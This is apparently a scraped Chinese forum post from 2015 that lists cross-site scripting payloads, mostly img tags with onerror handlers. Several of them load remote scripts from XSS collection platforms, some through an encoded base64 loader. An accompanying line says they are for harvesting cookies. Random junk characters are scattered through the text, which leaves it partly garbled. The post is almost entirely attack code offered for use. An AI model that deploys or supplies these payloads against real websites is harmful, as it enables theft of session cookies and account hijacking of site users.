<img src='non-exist.jpg'onerror="alert('xss')">
8 z4 Y& k+ W) o. L& J<img src=# onerror=alert(123)>
$ L: Y" f x& g, Q<img src=# onerror=alert(document.cookie)>
( \! }2 v: y* P! _0 |! a: T) g- O下面是利用平台钓cookie的
! i# j8 J4 n0 t" ~( j& ^( y <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
a+ O- j, [; t) S" C+ n9 r: _8 r. l4 \* n; m; |' G
0 w& J8 L, N- W% T* e: M' Q7 R
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>1 p- I, ~, f* M+ O
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
" |. W0 @. p$ y9 b7 K [“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
3 K0 ^6 o T9 F& m( _+ t<img src=1 onerror=jQuery.getScript("//xss.re/974")> % D- V% q$ R; N0 k7 Q' W
<img src="#">! }/ U+ ?$ H8 z6 l3 f3 a U# a
<img src="#">
! M. p' w3 y- p<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
1 M8 ~0 `) E$ s% z$ \$ h<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">, a8 |. R/ ~! k7 z
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>- ~/ V @ S4 ]3 B& _! Z/ @% i
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
) V( Z! x+ ~# K' J# l( c( w% n* {, f<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>* m d" k* R* A, ^: M1 D% R
<img src=x width="0" height="0"></img>& j$ R! j/ f% j. K0 j2 h* C3 G
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
. x2 T/ N' o$ e9 [! w<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>8 R4 }; L1 t7 V# r+ X, n1 b
|
发表于 2015-10-18 14:33:54
收藏
支持
反对